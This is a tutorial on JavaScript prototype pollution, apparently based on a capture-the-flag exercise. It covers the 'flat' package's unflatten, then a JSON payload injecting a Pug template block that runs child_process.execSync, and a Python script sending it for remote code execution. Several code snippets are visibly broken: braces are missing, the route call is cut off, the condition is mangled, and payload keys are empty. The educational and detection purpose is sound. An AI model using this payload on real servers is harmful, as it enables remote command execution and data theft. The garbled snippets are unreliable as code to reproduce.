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Prototype Pollution


Prototype Pollution is a vulnerability that allows an attacker to manipulate the properties of an object’s prototype. By modifying the object prototype, attackers can inject malicious properties or methods into all instances of that object type, potentially leading to serious issues like remote code execution (RCE).

Understanding Prototype Pollution

What is a Prototype?

In JavaScript, objects inherit properties and methods from their prototype. Every object in JavaScript has a __proto__ property, which links to its prototype. By manipulating the __proto__ object, it’s possible to inject properties or methods into all instances of that prototype.

How Does Prototype Pollution Occur?

Prototype Pollution happens when a user-controlled input can modify the prototype of an object using properties such as __proto__, constructor.prototype, or prototype.

Example of Vulnerable Code:

const { unflatten } = require('flat');

let data = {
    name: "John"

// User-controlled input
let payload = {
    "__proto__.admin": true

// Unflatten the payload
let obj = unflatten(payload);

// Checking the polluted object
console.log(obj.admin); // true
console.log(data.admin); // true (Polluted)

In the above example, the unflatten function allows users to insert arbitrary properties into the __proto__ object, polluting the prototype.

Attack Scenario: Exploiting Prototype Pollution in Node.js

Vulnerable Application

We analyze a vulnerable Node.js application using Pug templating and the flat package to process user input.

Relevant Dependencies (from package.json):

    "dependencies": {
        "express": "^4.17.1",
        "flat": "5.0.0",
        "pug": "^3.0.0"

Vulnerable Code Snippet

const { unflatten } = require('flat');
const pug = require('pug');'/api/submit', (req, res) => {
    const { artist } = unflatten(req.body);

    if ('Haigh')) {
        return res.json({
            'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
    } else {
        return res.json({
            'response': 'Invalid artist name.'


The unflatten function processes user input and is vulnerable to prototype pollution. By sending a malicious payload, an attacker can inject properties into the artist object’s prototype, leading to remote code execution.

Exploit Payload:

    "": "Haigh",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync('$(cat flag*)')"

In this case, the attacker injects a malicious block object into the prototype, which allows the execution of shell commands on the server.

Exploit Code (Python Script):

import requests

url = "http://localhost:1337/api/submit"

payload = {
    "": "Haigh",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('$(cat flag*)')"

r =, json=payload)

Real-World Impact

Remote Code Execution (RCE)

In the example provided, the injected block property leads to RCE by executing a shell command (cat flag*) on the server. The vulnerable application runs this command, exposing in this case a flag file, but it could be used to execute any arbitrary code.


Manual Testing

  • Test for prototype pollution vulnerabilities by submitting payloads that target __proto__ or other prototype-related properties.

    Example payload for testing:

        "__proto__.polluted": true

    If the application returns true for polluted, it is vulnerable.

Automated Tools

  • Burp Suite Extensions: Use Burp Suite with extensions like Prototype Pollution Scanner to automate the detection of prototype pollution vulnerabilities.

  • SAST/DAST Tools: Incorporate static and dynamic application security testing tools into your pipeline to identify potential prototype pollution flaws.


Prototype pollution is a critical web vulnerability, especially in JavaScript-based environments like Node.js. It can lead to severe consequences such as remote code execution, privilege escalation, and denial of service. By ensuring proper input validation, using secure libraries, and disabling unsafe features in templating engines, developers can mitigate these risks effectively.
